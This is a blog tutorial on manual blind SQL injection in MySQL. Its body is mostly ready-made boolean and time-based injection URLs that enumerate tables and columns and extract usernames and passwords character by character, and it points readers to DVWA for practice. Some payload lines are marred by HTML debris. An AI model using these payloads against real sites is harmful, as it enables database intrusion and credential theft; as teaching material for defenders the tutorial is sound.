Skip to main content

MySQL: Blind Injection steps - Manually


While preparing for an upcoming presentation, I came across Blind SQL Injection. Following steps I found helpful and you might find it useful.

There are 2 types of Blind SQL Injections:
1. Normal Blind => Where you get TRUE/FALSE responses based on output of SQL query. This is visible change in page.
2. Totally Blind => No change in output for TRUE/FALSE condition.

1. Normal Blind:
Vulnerable URL:
hxxp://site/page.php?id=1

TRUE Response:
hxxp://site/page.php?id=1 AND 1=1

FALSE Response:
hxxp://site/page.php?id=1 AND 1=2

Check Version:
hxxp://site/page.php?id=1 AND substring(version(),1,1)=4 <-- br="" false="" response="">hxxp://site/page.php?id=1 AND substring(version(),1,1)=5 <-- br="" response="" true="">
Database version is MySQL 5.x.x.

Table & Columns:
We need to guess table & column names. For this, subselect should be supported.

Check subselect:
hxxp://site/page.php?id=1 AND (select 1)=1 <-- --="" be="" br="" response="" should="" subselect="" supported="" this="" true="">
Guessing Table name:
hxxp://site/page.php?id=1 AND (select 1 from admin limit 0,1)=1 <-- br="" false="">hxxp://site/page.php?id=1 AND (select 1 from users limit 0,1)=1 <-- br="" true="">
Table found 'users'.

Here we trying to get 1st row as 1, so when table exists, the query returns 1 and conditions is TRUE. When the table is not there, it's FALSE as there will be error in query execution which is not visible to us.

Guessing Columns:
hxxp://site/page.php?id=1 AND (select substring(concat(1,pass),1,1) from users limit 0,1)=1 <-- br="" false="">hxxp://site/page.php?id=1 AND (select substring(concat(1,password),1,1) from users limit 0,1)=1 <-- br="" true="">
Column 'password' found.

Here we concating 1 with value from supplied column name & then check 1st char with substring(). If column exists, it'll return 1+(password value of 1st row) and substring will pull out 1st char which is '1' and comparing with 1 which will be TRUE. If column does not exists, it's return nothing, which FALSE the condition.

Data Mining:

We found table name as 'users' & columns as 'password' and 'username'.

hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>90 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>100 --> FALSE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>96 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>97 --> FALSE

This means 1st character is CHAR(97)='a'.

Here we are 1st concating username with password values for 1st row (Limit) which will be in formation like 'username:password' and then coverting 1st character of it in ascii and checking with numeric value. If response is TRUE, increase and check till get the first FALSE.

Now to know 2nd character, just increase the char in substring() and repeat the process.
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>80 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>90 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>100 --> FALSE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99 --> TRUE
hxxp://site/page.php?id=1 AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>100 --> FALSE

Second character is CHAR(100) = 'd'

The end of string will be TRUE for >0 condition. So you will come to know that you reached the end.

2. Totally Blind:
As this type didn't have any TRUE/FALSE responses, we need to use time-based injection. Use IF() for condition and BENCHMARK() for time delay. These 2 can be used with UNION SELECT, but again finding correct number of columns is pain as there is no direct method i know.

Detecting Version:
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING(version(),1,1)=5,BENCHMARK(5000000,MD 5(CHAR(1))),null),null ---> delay of 5 secs (TRUE)
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING(version(),1,1)=4,BENCHMARK(5000000,MD 5(CHAR(1))),null),null ---> no delay (FALSE)
When the condition in IF() is TRUE, you can see a delay of few seconds in response as compared to the one when condition results in FALSE.

Table and column guessing:
As described in 'Normal Blind', the same process can be followed here to guess the table and column names.

Table name guessing:
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING((select 1 from users limit 0,1),1,1)=1,BENCHMARK(5000000,MD5(CHAR(1))),null), null

Delay if table 'users' exists or no delay if not exists.

Column name Guessing:
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING((select substring(concat(1,pass),1,1) from users limit 0,1),1,1)=1,BENCHMARK(5000000,MD5(CHAR(1))),null), null

Delay if column 'pass' exists or no delay if not exists.

Getting Data:
hxxp://site/page.php?id=1 UNION SELECT IF(SUBSTRING(user,1,1)=CHAR(97),BENCHMARK(5000000, MD5(CHAR(1))),null),null FROM users limit 0,1

Delay if first character of 1st row of 'user' column in 'users' table is 'a' or no delay if it's not.

This way we can mine data. As you seen, this is time consuming. Tools like SQLMap are really good at this type of operations. But it always good to know the basics before firing any tool. You can use DVWA Blind SQL Injection in 'Medium' security to test these attacks.

Hope this helps someone , someday, somewhere.
 Good. However, since the MySQL version is 5.x.x, you can take the help of information_schema to enumerate rather than guessing table names.

It need not always be users. To help you in this case,

Code:
hxxp://site.com/page.php?id=1 and ascii(substring((select group_concat(table_name) from information_schema.columns where column_name like 0x257061737325),1,1))>0
Enumerates all the table names with a column containing the string, "pass". Now, this should work even if the column name is, pass/passwd/password and so on.

Comments

Post a Comment

Popular posts from this blog

Top 20 Tools for hacking 2018

What are Hacking Tools? Hacking Tools are computer programs and scripts that help you find and exploit weaknesses in computer systems, web applications, servers and networks. There is a variety of such tools available on the market. Some of them are open source while others are commercial solution. In this list we highlight the top 20 tools for Ethical Hacking of web applications, servers and networks 1)  Netsparker Netsparker  is an easy to use web application security scanner that can automatically find SQL Injection, XSS and other vulnerabilities in your web applications and web services. It is available as on-premises and SAAS solution. Features Dead accurate vulnerability detection with the unique Proof-Based Scanning Technology. Minimal configuration required. Scanner automatically detects URL rewrite rules, custom 404 error pages. REST API for seamless integration with the SDLC, bug tracking systems etc. Fully scalable s...
Post a Comment
Read more

SKILLS REQUIRED BECOME A ETHICAL HACKER

What is a programming language? A programming language is a language that is used to develop computer programs. The programs developed can range from operating systems; data based applications through to networking solutions.   Why should you learn how to program? Hackers are the problem solver and tool builders, learning how to program will help you implement solutions to problems. It also differentiates you from script kiddies. Writing programs as a hacker will help you to automate many tasks which would usually take lots of time to complete. Writing programs can also help you identify and exploit programming errors in applications that you will be targeting. You don’t have to reinvent the wheel all the time, and there are a number of open source programs that are readily usable. You can  customize the already existing applications and add your methods to suit your needs . What languages should I learn? The answer to this question  depends on your ta...
2 comments
Read more

crypthography and network security

Cryptography, which translates as "secret writing," refers to the science of concealing the meaning of data so only specified parties understand a transmission's contents. Cryptography has existed for thousands of years; for most of history, however, the users of cryptography were associated with a government or organized group and were working to conceal secret messages from enemies. These days, millions upon millions of secure, encoded transmissions happen online each day -- and cryptographic standards are used to protect banking data, health information, and much more. Without cryptography, e-commerce as we know it would be impossible. Since online security threats evolve so quickly, there are dozens of different schools of thought on how best to use encryption to enhance network security -- not just for governments, but for businesses and end users, too. Classical Encryption Techniques Classical Encryption Techniques Explained at Purdue University (PDF) : These...
Post a Comment
Read more